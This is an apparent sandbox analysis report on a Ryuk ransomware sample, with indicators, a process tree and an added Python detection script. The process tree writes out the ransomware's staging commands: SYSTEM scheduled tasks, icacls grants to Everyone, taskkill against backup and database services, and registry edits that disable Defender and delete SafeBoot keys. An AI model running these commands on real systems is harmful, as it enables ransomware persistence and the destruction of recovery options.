Analysis
-
max time kernel
137s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system -
submitted
20-10-2022 15:40
Static task
static1
Behavioral task
behavioral1
Sample
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
Resource
win10v2004-20220901-en
General
-
Target
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
-
Size
885KB
-
MD5
a650d5676dc2c91a3af2216044ddaf8c
-
SHA1
851eea629fda6f930ebfd7ac45de5e8bc3f506b5
-
SHA256
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
-
SHA512
463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7
-
SSDEEP
12288:q/2O9w8wycU2JlJYqWYgeWYg955/155/0QebUlAAsjsKqgooRn6X:qbC8tUlqgQKUKRjsKqgbN6
Malware Config
Extracted
C:\ProgramData\RyukReadMe.txt
filereopening@msgden.com
filereopening@cyberfear.com
Signatures
-
Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
-
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
Processes: attrib.exe, cmd.exe
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (attrib.exe)
File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (cmd.exe)
File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (cmd.exe)
-
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
-
Drops file in Program Files directory 64 IoCs
Processes: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes: schtasks.exe
PID 2044 schtasks.exe
PID 588 schtasks.exe
PID 1516 schtasks.exe
PID 1732 schtasks.exe
-
Kills process with taskkill 2 IoCs
Processes: taskkill.exe
PID 1944 taskkill.exe
PID 1912 taskkill.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes: taskkill.exe
Token: SeDebugPrivilege, PID 1944 taskkill.exe
Token: SeDebugPrivilege, PID 1912 taskkill.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe, cmd.exe
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes: attrib.exe
PID 596 attrib.exe
PID 1784 attrib.exe
PID 460 attrib.exe
Processes
-
[1] C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        - Creates scheduled task(s)
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      - Drops startup file
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        - Creates scheduled task(s)
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\attrib.exe
        Command line: attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        - Drops startup file
        - Views/modifies file attributes
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F
        - Creates scheduled task(s)
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F
        - Creates scheduled task(s)
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\attrib.exe
        Command line: attrib +h +s ryuk.exe
        - Views/modifies file attributes
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\attrib.exe
        Command line: attrib +h +s C:\ProgramData\ryuk.exe
        - Views/modifies file attributes
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        Command line: cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      [4] C:\Windows\system32\icacls.exe
          Command line: icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          - Modifies file permissions
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\reg.exe
        Command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe
        Command line: cmd.exe /c taskkill /t /f /im sql*
      [4] C:\Windows\system32\taskkill.exe
          Command line: taskkill /t /f /im sql*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\taskkill.exe
        Command line: taskkill /f /t /im veeam*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  [2] C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
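The process tree above is a compact catalogue of Ryuk's pre-encryption staging: logon-triggered scheduled tasks and a Startup-folder copy for persistence, attrib +h +s to hide the dropped binaries, a recursive icacls grant to Everyone, EnableLinkedConnections so mapped network drives are reachable from the elevated token, taskkill against SQL, Veeam and Exchange processes, and registry edits that disable Task Manager, Windows Defender and Safe Mode boot. The Python below is an added hunting example, not part of this Triage report or of the sample: it runs a small rule set over process-creation events constructed from the report's own command lines (the pid/image/cmd layout is a simplification, not a real Sysmon or EDR schema) and adds a benign control event to show the rules do not fire on an ordinary daily task. The ATT&CK IDs are my mapping to the current sub-technique matrix, not taken from the report's own ATT&CK v6 section.

```python
"""Hunting rules for the Ryuk staging behaviour shown in the process tree.

Added example, not part of this Triage report or of the sample. EVENTS is
constructed from the report's command lines plus one benign control; the
pid/image/cmd layout is a simplification, not a real log schema. ATT&CK IDs
are an assumed mapping to the current sub-technique matrix.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    tactic: str       # persistence | defense-evasion | impact
    technique: str    # ATT&CK ID (assumed mapping, see module docstring)
    pattern: re.Pattern


def _rx(p: str) -> re.Pattern:
    return re.compile(p, re.IGNORECASE)


RULES = [
    Rule("logon-triggered task pointing at a user-writable path", "persistence", "T1053.005",
         _rx(r'schtasks\s+/create\b.*?/sc\s+onlogon\b.*?/tr\s+"?(?:c:\\programdata|c:\\users\\[^\\]+\\appdata)')),
    Rule("task registered to run as SYSTEM at highest run level", "persistence", "T1053.005",
         _rx(r'schtasks\s+/create\b.*?/ru\s+system\b.*?/rl\s+highest\b')),
    Rule("executable copied into a Startup folder", "persistence", "T1547.001",
         _rx(r'\bcopy\b.*?\\start menu\\programs\\startup\\[^\\"]+\.exe')),
    Rule("hidden+system attributes set on an executable", "defense-evasion", "T1564.001",
         _rx(r'\battrib\b.*?\+h\b.*?\+s\b.*?\.exe')),
    Rule("recursive Full Control granted to Everyone", "defense-evasion", "T1222.001",
         _rx(r'\bicacls\b.*?/grant\s+everyone:\(oi\)\(ci\)f\b.*?/t\b')),
    Rule("EnableLinkedConnections=1 (mapped drives visible to elevated token)", "defense-evasion", "T1112",
         _rx(r'reg\s+add\b.*?\\policies\\system\b.*?/v\s+enablelinkedconnections\b.*?/d\s+1\b')),
    Rule("backup, database or mail processes force-killed", "impact", "T1489",
         _rx(r'\btaskkill\b.*?/im\s+(?:sql|veeam|msexchange|microsoft\.exchange|pvx|dbsrv)\*')),
    Rule("Task Manager disabled by policy", "defense-evasion", "T1562.001",
         _rx(r'reg\s+add\b.*?/v\s+disabletaskmgr\b.*?/d\s+1\b')),
    Rule("Windows Defender disabled by policy", "defense-evasion", "T1562.001",
         _rx(r'reg\s+add\b.*?\\windows defender"?\s+/v\s+disableantispyware\b.*?/d\s+1\b')),
    Rule("SafeBoot key values deleted (Safe Mode boot broken)", "defense-evasion", "T1112",
         _rx(r'reg\s+delete\b.*?\\control\\safeboot\b.*?/va\b')),
]


@dataclass(frozen=True)
class Finding:
    pid: int
    image: str
    rule: Rule


def evaluate(events):
    """One Finding per (event, matching rule). cmd.exe wrappers fire as well as
    their children, which is intended: the wrapper is the pivot to the parent."""
    return [Finding(ev["pid"], ev["image"], rule)
            for ev in events for rule in RULES if rule.pattern.search(ev["cmd"])]


def assess(findings):
    """Ryuk's staging spans all three tactics before encryption starts. Any one
    alone is only suspicious: admins also create logon tasks and stop services."""
    tactics = {f.rule.tactic for f in findings}
    if {"persistence", "defense-evasion", "impact"} <= tactics:
        return "ransomware-staging"
    return "suspicious" if tactics else "clean"


# Constructed events: command lines taken from the report's process tree, plus a
# benign daily task (pid 10) that must produce no finding.
EVENTS = [
    {"pid": 1, "image": r"C:\Windows\system32\cmd.exe",
     "cmd": r'C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"'},
    {"pid": 2, "image": r"C:\Windows\system32\schtasks.exe",
     "cmd": r"schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F"},
    {"pid": 3, "image": r"C:\Windows\system32\schtasks.exe",
     "cmd": r'schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F'},
    {"pid": 4, "image": r"C:\Windows\system32\attrib.exe", "cmd": r"attrib +h +s C:\ProgramData\ryuk.exe"},
    {"pid": 5, "image": r"C:\Windows\system32\icacls.exe", "cmd": r"icacls * /grant Everyone:(OI)(CI)F /T /C /Q"},
    {"pid": 6, "image": r"C:\Windows\system32\reg.exe",
     "cmd": r"reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f"},
    {"pid": 7, "image": r"C:\Windows\system32\taskkill.exe", "cmd": r"taskkill /f /t /im veeam*"},
    {"pid": 8, "image": r"C:\Windows\system32\reg.exe",
     "cmd": r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"pid": 9, "image": r"C:\Windows\system32\reg.exe",
     "cmd": r"reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F"},
    {"pid": 10, "image": r"C:\Windows\system32\schtasks.exe",
     "cmd": r'schtasks /CREATE /SC DAILY /TN AcmeBackup /TR "C:\Program Files\Acme\backup.exe" /F'},
]

if __name__ == "__main__":
    found = evaluate(EVENTS)
    for f in found:
        print(f"pid {f.pid:>2} {f.rule.technique:<10} {f.rule.tactic:<16} {f.rule.name}")
    print("verdict:", assess(found))
```

The verdict logic is the part worth keeping: each rule on its own has legitimate hits (a logon task, a stopped SQL service), but the three tactics appearing together on one host within a single sandbox run, as they do here, is what distinguishes ransomware staging from administration.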
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\ProgramData\RYUKID
Filesize: 8B
MD5: f7c9aa8109768d75ea7402cb915b51be
SHA1: cc649a88c2266ae98c2c378a138329e9dcf1832a
SHA256: a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa
SHA512: bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7
-
C:\ProgramData\RyukReadMe.txt
Filesize: 1KB
MD5: e5776afce2e7d6fa4feb7a0c4bc2e004
SHA1: 8b3cd15a7e34d4b1c0800dad92a07c60647f44dd
SHA256: 4ce8d384cf4f82223dde53c4fe9e9e4a249140068ecc9146b6d68c14278a3be7
SHA512: d03dafeae3ccced40bc20dcbc5cfffc13ec01b163d0d7ff5291c088f3e56971645837a0f3405c32fc6467a2d39d2396645b3eac0b2076d88a3110c42b53cd7c6
-
C:\ProgramData\hrmlog1
Filesize: 2KB
MD5: bf3dc7e7792a2b38f146440ad4f79a22
SHA1: a323a963c8efbd3480399611c34bd38a0c8f6721
SHA256: f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
SHA512: 04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805
-
C:\ProgramData\hrmlog2
Filesize: 292B
MD5: 9dbd99471b38780584934dce1c838dc8
SHA1: 8826b382ab74a575991fc5a5747bea695913199b
SHA256: 02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
SHA512: 01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b
-
C:\ProgramData\ryuk.exe
Filesize: 885KB
MD5: a650d5676dc2c91a3af2216044ddaf8c
SHA1: 851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512: 463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7
-
C:\Users\Admin\AppData\Local\Temp\RYUKID
Filesize: 8B
MD5: f7c9aa8109768d75ea7402cb915b51be
SHA1: cc649a88c2266ae98c2c378a138329e9dcf1832a
SHA256: a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa
SHA512: bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7
-
C:\Users\Admin\AppData\Local\Temp\hrmlog1
Filesize: 2KB
MD5: bf3dc7e7792a2b38f146440ad4f79a22
SHA1: a323a963c8efbd3480399611c34bd38a0c8f6721
SHA256: f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41
SHA512: 04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805
-
C:\Users\Admin\AppData\Local\Temp\hrmlog2
Filesize: 292B
MD5: 9dbd99471b38780584934dce1c838dc8
SHA1: 8826b382ab74a575991fc5a5747bea695913199b
SHA256: 02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a
SHA512: 01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe
Filesize: 885KB
MD5: a650d5676dc2c91a3af2216044ddaf8c
SHA1: 851eea629fda6f930ebfd7ac45de5e8bc3f506b5
SHA256: 775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6
SHA512: 463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7
-
memory/268-58-0x0000000000000000-mapping.dmp
-
memory/288-72-0x0000000000000000-mapping.dmp
-
memory/304-76-0x0000000000000000-mapping.dmp
-
memory/332-61-0x0000000000000000-mapping.dmp
-
memory/460-71-0x0000000000000000-mapping.dmp
-
memory/528-66-0x0000000000000000-mapping.dmp
-
memory/540-74-0x0000000000000000-mapping.dmp
-
memory/580-98-0x0000000000000000-mapping.dmp
-
memory/588-60-0x0000000000000000-mapping.dmp
-
memory/596-62-0x0000000000000000-mapping.dmp
-
memory/612-64-0x0000000000000000-mapping.dmp
-
memory/700-68-0x0000000000000000-mapping.dmp
-
memory/840-54-0x0000000000000000-mapping.dmp
-
memory/860-103-0x000007FEFB741000-0x000007FEFB743000-memory.dmp
Filesize: 8KB
-
memory/1012-73-0x0000000000000000-mapping.dmp
-
memory/1036-97-0x0000000000000000-mapping.dmp
-
memory/1040-99-0x0000000000000000-mapping.dmp
-
memory/1192-77-0x0000000000000000-mapping.dmp
-
memory/1376-70-0x0000000000000000-mapping.dmp
-
memory/1384-101-0x0000000000000000-mapping.dmp
-
memory/1420-93-0x0000000000000000-mapping.dmp
-
memory/1432-75-0x0000000000000000-mapping.dmp
-
memory/1516-65-0x0000000000000000-mapping.dmp
-
memory/1528-102-0x0000000000000000-mapping.dmp
-
memory/1528-59-0x0000000000000000-mapping.dmp
-
memory/1568-87-0x0000000000000000-mapping.dmp
-
memory/1648-91-0x0000000000000000-mapping.dmp
-
memory/1660-78-0x0000000000000000-mapping.dmp
-
memory/1728-100-0x0000000000000000-mapping.dmp
-
memory/1732-67-0x0000000000000000-mapping.dmp
-
memory/1736-56-0x0000000000000000-mapping.dmp
-
memory/1784-69-0x0000000000000000-mapping.dmp
-
memory/1892-95-0x0000000000000000-mapping.dmp
-
memory/1912-84-0x0000000000000000-mapping.dmp
-
memory/1944-79-0x0000000000000000-mapping.dmp
-
memory/2004-96-0x0000000000000000-mapping.dmp
-
memory/2012-80-0x0000000000000000-mapping.dmp
-
memory/2024-83-0x0000000000000000-mapping.dmp
-
memory/2044-55-0x0000000000000000-mapping.dmp